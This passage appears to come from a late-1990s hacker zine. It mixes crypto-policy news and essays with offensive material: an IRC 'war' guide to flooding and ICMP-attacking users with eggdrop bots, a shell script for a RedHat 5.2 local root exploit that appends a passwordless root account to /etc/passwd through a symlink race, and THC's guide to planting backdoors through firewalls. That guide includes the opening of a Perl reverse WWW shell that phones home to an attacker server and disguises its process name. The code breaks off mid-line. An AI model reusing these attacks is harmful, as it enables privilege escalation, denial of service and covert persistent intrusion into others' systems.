president of the California-based Association for Computing Machinery, said the proposed bill bodes poorly for citizens' privacy. "Our lives are moving more and more online," she said. "There's always the risk that some future government or administration might compromise the rights and freedoms we enjoy today and take advantage of this technology." The proposed bill was not a surprise, she said, because FBI Director Louis Freeh "has been pushing to have access keys for a long time." Fred Smith, an attorney in Santa Fe, N.M., who works as a special prosecutor in computer cases, said he does not believe the administration's motives are nefarious. "I really believe that there's a serious and good faith concern about what we're going to do if encryption takes off the way it appears to be taking off at the moment," he said. A spokesman for DOJ described the proposal as "pending" and declined to comment on it. One Capitol Hill staffer had some concerns. "I think they are really trying to hobble how people use encryption," said Ellen Stroud, spokeswoman for Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through Encryption Act, which would relax controls on the export of encryption and prohibit the government from requiring a backdoor into people's e-mail and computer files. Stroud said law enforcement officials examining electronic files as they pursue criminals in cyberspace could accidentally modify or destroy a company's legitimate files. "[The proposal] doesn't provide the needed protection for companies using encryption," she said. "You're putting yourself at greater liability [if you use a third-party firm to keep encryption keys.] It's easier for somebody to search you." Stroud also said owners of information searched during a criminal investigation will not necessarily know what information law enforcement officials have been examining because the draft bill would allow law enforcement officials in some cases to delay issuing notice of the search warrant. "If you want information from me, come to me and get it," Stroud said. "Why go to somewhere else? Why go to my neighbor? If you have a problem, hit it straight on." @HWA 04.0 The lost art of IRC warfare using eggdrop bots ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I found this while looking for a country script for a certain bot on a certain channel and found it pretty informative...so its here for you to peruse and perhaps learn a thing or two from the 'other' side of IRC. - Ed IRC WAR ~~~~~~~~ Fighting with, and against, the Eggdrop Bot! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Stormking The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood, icmp, nuke, and easily takeover channels. It is also damn near impossible to kill! On this page I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot. By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to set them up for maximum damage. First, lets make sure yer bot's protection is set up properly. Eggdrop flood protection is set in the config file, way down in the "###MORE ADVANCED STUFF###" section. Heres an example from a 1.1.4 bot: # how many msgs in how many seconds from the same host constitutes a flood? set flood-msg 5:60 # how many public msgs in how many seconds? set flood-chan 10:60 # how many joins/nick changes in how many seconds? set flood-join 5:60 # how many CTCPs in how many seconds? set flood-ctcp 3:60 You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the defaults. If you feel you need extra protection, its there. Fighting With Eggdrop So you got a new bot and you want to be a badass? Well, its easy enough to do. After you have yer bot's protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/ in the appropriate scripts section for yer bot version. Here's a list of some of my favorites: - icmp tcl Fabulous, if yer shell supports ping - Chantoolz Has its own floods too. For 1.0x - takeover.tcl Self explanatory. For 1.0x - massmode1.1a.tcl 1.1x takeover script - mjoin.tcl A mass join script for botnets - flud501e.tcl 1.0x fludnet scripts. Rox their asses! - flud501f-oc.tcl 501e modified for 1.1x bots - Wardrop.tcl Most everything combined into one script! There are also a few advanced Unix war programs like "botnuke", "ssping", and "pepsi" but they require root access so almost noone can use them. If you have root access, you likely don't need me to tell you how to play war on Unix! The same goes for the fabled "spoofers", if you have them, you know how to use them. OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are planning on loading a script you should always open it in an editor to see if there is anything you need to set before loading it. Now's a good time to look the script over for the basic commands, and the help commands! For example, the help file in takeover.tcl is accessed with the command ".thelp". This is a typical usage. Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff unless you want problems with opers. Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping or allow only very limited pinging. Its easy to find out if you got lucky.... Just load the script, no editing needed for the test. In dcc type ".set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and type ".icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several things. Most likely it will say "Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script. It might, however, say "now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless level. The help file for icmp.tcl is "icmp". Another kewl script is mjoin.tcl. Its a botnet mass join/part script. Its usage is real simple, just load it and type ".mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being jerked into strange channels. Those people, of course, shouldn't run this tcl but some do...... The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above. Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version. The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea! There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top: # set flag1 "e" ;# Flag suggested for fludflag. set fludword "flud" ;# Word to use for fluding set fludflag "m" ;# Flag required for fluding. set fludver "501-e" ;# Flud Version. DON'T Change(I'll kill you if you do)! set fludmax 10 ;# Max times to flud. set fluddef 5 ;# Default flud times. set fludnap45 ;# Leave this at 45 to keep the net in synch! set fludnet "EFnet" ;# Net you are on. set fludact 1 ;# Flud on or off? (0/1) set ircnick "" ;# Define your IRC nickname here. EXTREME PROTECTION! set fludnick 0 ;# Change to 1 to Enable Nick Changes during fludz. The first one, #set flag1 "e", you have to uncomment if you want to use it. It gives users a seperate flag if they are allowed to flud. I never use this, I just leave the fludflag at "m", allowing any master to flud. The only settings you might need to change here are the fludnet, ircnick, and fludnick. Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the botnet and on irc, a good idea in my opinion. 1.1x allows you to set "botnet nick" in the config file so its not needed here. Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. Its up to you! OK, once you have these things set its time to learn how to use flud. The help file for flud.tcl is ".fludhelp". You will need it. There are many types of fluds available, each useful in certain situations. The basic syntax for fluds is ".flud/ nick /# of times/ type of flud". In other words, ".flud butthead 10 15" would flud butthead 10 times with a type 15 flud, a "Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I use a "4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little chat windows on yer victims screen. Not very effective but annoying as hell! Experiment, find yer own favorites. A few other useful commands are ".fludbots", which tells you how many bots will flud, and ".last" which tells who made the last flud. Set yer console to +5 to see flud results and progress. Always remember the main rule of fludding, do a /whois on yer victim before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets will kick you off for fludding an oper. Remember this. You have been warned. Fighting Against Eggdrop Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A strong icmp, such as from a T3, will kill a bot but thats about it. This assumes, of course, that yer bot is on a solid shell (Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at this but a few will drop. Its worth a try if you need to kill an Eggdrop. If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a good nuker set for non-standard protocols like "host unreachable". If these things don't work yer likely stuck with waiting and hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns. In Conclusion Many people nowadays say things like "IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through superior firepower. @HWA 05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by icesk HAPPY_FILE="/etc/passwd" MAGIC_FILE="/tmp/.font-unix" MAGIC_USER="1C3SK" LOGIN=`which login` ln -s $HAPPY_FILE $MAGIC_FILE echo "made symlink;" `ls -l $MAGIC_FILE` while (HAPPY_FILE=HAPPY_FILE); do sleep 2; if [ -w $HAPPY_FILE ]; then echo $MAGIC_USER"::0:0::/:/bin/sh:" echo $MAGIC_USER"::0:0::/:/bin/sh:" >> /etc/passwd $LOGIN $MAGIC_USER exit fi; done fi done @HWA 06.0 The state of crypto today ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hackernews.com/ contributed by Brian Oblivion Cyberspace Electronic Security Act, CALEA, OECD, The Wassenaar Arrangement, SAFE, HR-2616, S798, HR-2617, UCITA, and on and on and on. Just what the hell is going on? The government wants crypto controls and the public doesn't. Buffer Overflow http://www.hackernews.com/orig/buffero.html The State of Crypto Policy Today: If you have nothing to hide... By: Brian Oblivion L0pht Heavy Industries The World remains forever changed by the promise of international telecommunications. For the past 3 decades we have enjoyed an ever growing communications explosion providing a mechanism for the free flow of information internationally. With early communications systems, Governments could easily setup listening posts on international links before exiting the country via undersea cable or satellite uplinks. Prior to the mid-1980's the resources to protect communications via cryptography were cost prohibitive and physically constraining. Privacy is power, therefore it must be regulated. Today, the proliferation of high-performance, low-power, low-cost micro-processors have opened the door to build cryptographic protection into all communication systems. This would render existing governmental listening outposts obsolete. We know this is true, due to the scrambling at hand on curtailing the proliferation of strong encryption systems and software. The intelligence communities have noticed a sharp increase in encrypted traffic across the communications networks of the world. This originally prompted the US (United States) to advertise the use of Key Escrow/Recovery encryption, where the keys used to protect information would be stored by a trusted third party. Later, a key could "lawfully" be obtained to decrypt stored files or communications in real-time once protected by that key. International and domestic opposition to Key escrow/recovery systems has seemed to triumph in Europe and most of the world. The OECD (Organization for Economic Cooperation and Development), a Paris-based international body of 29 countries, resisted lobbying by the US Department of Justice, FBI and NSA to endorse key escrow/recovery systems. The European Union is a staunch opponent to Key Escrow regimes and is presently removing inter-union restrictions on encryption products, leading the way for other countries to adopt privacy focused strategies. In addition to OECD, The Wassenaar Arrangement, a 32 country body, sets export controls for conventional weapons and sensitive dual-use goods and technologies. The US successfully lobbies this organization, and uses it to assert its crypto policy on an international scale. The bulk of the restrictions on dual-use goods and technologies are uncannily similar to those which are promulgated by the United States. Recently the Arrangement increased export restrictions on encryption products with 64-bit or greater key sizes. In light of this new restriction, many countries have voiced their opposition to this change in policy and plan on not adopting the new restriction. While no country is bound by any of these agreements, they are encouraged to adopt the guidelines set forth by these bodies. When countries fail to adequately interpret the guidelines to be in line with US interpretation, diplomatic consultation results. Recently Janet Reno, US Attorney General, wrote the chancellor of Germany's Federal Secretary of Justice to restrict the distribution of "public domain" encryption products. It can be surmised that the position of the US is to petition others to remove all public domain encryption software from distribution servers currently on the Internet. As a direct result of this international collaboration of encryption policy, the US has recently published its policy on encryption usage, as House Resolution HR-2616. The policy is mostly well founded, and while still not relaxing encryption export controls on encryption bit lengths over 64-bit, it still allows US Citizens to use any encryption they should choose without mandating key escrow mechanisms. " ...it shall be lawful for any person within any State and for any United States person to use any encryption product, regardless of encryption algorithm selected, encryption bit length chosen, or implementation technique or medium used." Hopefully the public at large will act responsibly with encryption technology. As with the current view of firearms, this freedom is likely to be short lived. Nowhere in the document does it discuss the ramifications of keeping keys in tamper-responsive hardware. Nor does it discuss the ramifications of reverse-engineering cryptographic implementations. It can be read that as long as you do not decrypt someone's communications or medium without their consent you are exempt from the laws referenced therein. There is also exclusion for encryption products and services which are used solely for access control, digital signatures, authentication or similar purposes. This does allow the decryption of passwords, and the like for security auditing and other such practices. However, Government encryption use is called to use escrowed cryptography, as well as are government contractors engaged in contract work for the government. This is actually more of a blessing than an impediment, where the government at least will have to continue to operate responsibly. The provision still exists where all investigations thwarted by the use of encryption will be recorded by the Attorney General, and maintained in classified form. The results of these findings will undoubtedly sway future addendums to the current policy toward encryption. The Security and Freedom through Encryption Act (SAFE), once a very liberating legislative initiative, has since come under attack by law enforcement and the intelligence community. The original goal of SAFE was to relax all exportation restrictions regardless of encryption key length. However, the restrictions are now back in the Act, with exceptions for key lengths of 64 bits or less. All other encryption software must first be subject to governmental review before permission can be granted for export. The export restriction on key length is to be set by a newly formed Encryption Export Advisory board, which shall be comprised of a chairman under the Secretary of Commerce for Export Administration. Seven other individuals appointed by the President representative of the NSA, CIA, the Office of the President, and four from the private sector who have expertise in the information security field. The board is to report to the president every 30 days on what encryption technology is suitable for export. The president can still override any recommendation they may come up with. The SAFE act continues prohibition on Federal or State governmental mandated key escrow systems. A provision stating that encrypted communications alone is not "probable cause" to obtain a search warrant to request the cleartext of said communications is a big win for privacy advocates. It blocks a blanket probable cause to eavesdrom on all communications, once the majority of traffic is encrypted. There are some extra penalties for using encryption to hide "criminal" activity. One can realize that this may become immaterial once it becomes the exception to not encrypt your communications channels or your storage mediums. Especially as the trend for hidden and low level crypto systems is on the rise. Another disturbing attribute is the mandatory, one-time 15-day technical review of your algorithms/equipment with the Secretary of Commerce. There are some specific restrictions for equipment which can be used for military or intelligence end use, or which may be used for terrorist organizations. It would seem that the definition of what can be construed as such equipment can be quite broad and applied to almost all encryption technologies. As with the US Crypto Policy house resolution, a committee to research buggered prosecutions due to the employment of encryption technologies, is to be established. The database will be 'classified', and accessible by appropriate law enforcement agencies. The results of this investigation will undoubted be used as a case to repeal the prohibition of mandated key escrow systems or a change in export policies. This bill has been introduced into the senate as the PROTECT Act of 1999, S798 IS. Money is power, therefore we are Taxed. HR 2617, "To amend the Internal Revenue Code of 1986 to allow a tax credit for development costs of encryption products with plaintext capability without the user's knowledge." There is a move in Congress (HR 2617) to alter the existing tax law to allow corporations which develop and implement encryption technologies a tax deduction. This tax deduction is not a reward for a high level of security, but rather, if the system has the capability of escrowing keys used in the system. In order for this strategy to work, taxes would continue to rise, thereby aiding those who conform to . The legitimate basis for this Resolution may be to stimulate development to support the US Governments own request for Key escrowed/recovery systems for its use. Privacy is privilege, therefore communications are supervised. To further understand the commitment the US Government has on domestic intelligence dominance, the Communications Assistance for Law Enforcement ACT (CALEA), which will provide law enforcement agencies cleartext or clearvoice in near real-time without the endusers knowledge, is clearing hurdle after hurdle. CALEA was once opposed by the telecommunications industry, but now that the Federal Government has removed the monetary burden, from industry to the government, almost all dissension has been quelled. Performing such a wiretap is permitted only by a court order. But with all new technology, remote capabilities and ease of use will undoubtedly provide some risk unauthorized monitoring of otherwise private communications. Another possibility is during emergency war powers or some other crisis, the inconvenience of obtaining a court order to perform a wiretap could be waived by a predatorial government, resulting in broad, undetectable eavesdropping capabilities. To thwart such activity, personal encryption technology will still be required to circumvent the buggered, state sponsored systems. Knowledge is power, therefore it must be controlled. In the US, The National Conference of Commissioners for Uniform State Laws (NCCUSL) has approved and adopted the Uniform Computer Information Transactions Act (UCITA). While this document has been criticized publicly by Attorney Generals from various states, some of the flaws are detrimental to security applications and condone poor programming practices. Even after cryptographic algorithms are verified to be relatively secure at a certain point in time, the implementation of the overall system utilizing the algorithm can be flawed. One must push software's bounds of normal operations to flesh out any potentially revealing error conditions. Using software outside of it's intended use is considered a breach of contract, and prohibited by the UCITA. There are also stipulations for publicly posting criticizing statements against faulty software. As security groups have proven, many times security holes are only addressed once widebanded to a software company's peers and customers. Cryptographic implementations must be allowed public scrutiny and analysis by ones peers. An implementation steeped in secrecy is usually flawed and obfuscated to prevent the revelation of such flaws. Removing the service of independent analysis will degrade the overall state of security in the industry, leaving the holes in the hands of manditory federal reviewers. As we move into the next millennium the topic of encryption will continue to strike up heated debate between Intelligence Communities and liberty advocates. The world is mostly comfortable to give up its privacy for a little security. This is usually done in comfortable political climates. Should that climate ever change, we will have given Government the keys to our lives, and the ability to keep its interests above and beyond the will its subjects. The cryptographic debate boils down to: the ability to communicate without the fear of government intrusion, or the possibility for all of your communications to be intercepted by an uninvited third party. If you have nothing to hide... OCED Cryptography Policy http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm Cryptography and Liberty 1999 http://www2.epic.org/reports/crypto1999.html UCITA http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm EPIC Cryptographic Policy Review http://www.epic.org/crypto @HWA 07.0 Using a backdoor in a firewalled system ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ http://www.rootshell.com/ ] -------------------------[ Placing Backdoors Through Firewalls --------[ van Hauser / THC ----[ Introduction This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system. Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used. As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun. ----[ Firewall Architectures There are two basic firewall architectures and each has an enhanced version. Packet Filters: This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags. This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm). Stateful Filters: This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.) This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1. Proxies / Circuit Level Gateways: A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed. Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd. Application Gateways: This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs. A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk). Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out. ----[ Getting in Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done. The four main possibilities: Insider: There's someone inside the company (you, girlfriend, chummer) who installs the backdoor. This is the easiest way of course. Vulnerable Services: Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you saw how many "firewalls" run sendmail for mail relaying ... Vulnerable External Server: People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together. Hijacking Connections: Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X). Trojans: Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are). ----[ Placing the Backdoors An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks. I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture. Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen. Packet Filters: It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder). b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done. c) daemonshell-udp is a backdoor shell via UDP (http://r3wt.base.org look for thc-uht1.tgz) d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one. Stateful Filters: Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used: active: tunnel from Phrack 52. ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive: netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org). reverse_shell from the thc-uht1.tgz package does the same. Proxies / Circuit Level Gateways: If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section. Application Gateways: Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed. active: (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-) (re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ... Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive: E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed. WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell) DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective) ----[ Backdoor Example: The Reverse WWW Shell This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company. For a better understanding take a look at the following picture and try to remember it onwards in the text: +--------+ +------------+ +-------------+ |internal|--------------------| FIREWALL |--------------|server owned | | host | internal network +------------+ internet |by the hacker| +--------+ +-------------+ SLAVE MASTER Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching. Example of a connection: Slave GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0 Master replies with g5mAlfbknz The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks: The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ... Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect. Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one. The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://r3wt.base.org for updates. ----[ Security Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases. A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker. ----[ Last Words Have fun hacking/securing the systems ... Greets to all guys who like + know me ;-) and especially to those good chummers I've got, you know who you are. Ciao... van Hauser / [THC] - The Hacker's Choice For further interesting discussions you can email me at vh@reptile.rug.be with my public pgp key below : Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- ----[ THE CODE <++> rwwwshell.pl #!/usr/bin/perl # Reverse-WWW-Tunnel-Backdoor v1.5 # (c) 1998 by van Hauser / [THC] - The Hacker's Choice # Check out http://r3wt.base.org for updates # # GENERAL CONFIG (except for $MASK, everything must be the same # for MASTER and SLAVE is this section!) # $CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! $MASK="vi"; # for masking the program's process name $PASSWORD="THC"; # anything, nothing you have to rememeber # (not a real "password" anyway) # # MASTER CONFIG (specific for the MASTER) # $LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) $SERVER="localhost"; # the host to run on (ip/dns) (the SLAVE needs this!) # # SLAVE CONFIG (specific for the SLAVE) # $SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) $DELAY="3"; # time to wait for output after your command(s) $TIME="00:01"; # time when to connect to the master (unset if now) $DAILY="sure"; # tries to connect once daily if set with something $PROXY=""; # set this with the Proxy if you must use one $PROXY_PORT=""; # set this with the Proxy Port if you must use one # END OF CONFIG # nothing for you to do after this point # ################## BEGIN MAIN CODE ################## require 5.002; use Socket; $|=1; # next line changes our process name if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } undef $DAILY if (! $TIME); if ( !($PROXY) || !($PROXY_PORT) ) { undef $PROXY; undef $PROXY_PORT; } $protocol = getprotobyname('tcp'); if ($ARGV[0] ne "") { if ($ARGV[0] eq "-h") { print STDOUT "no commandline option : daemon mode\n"; print 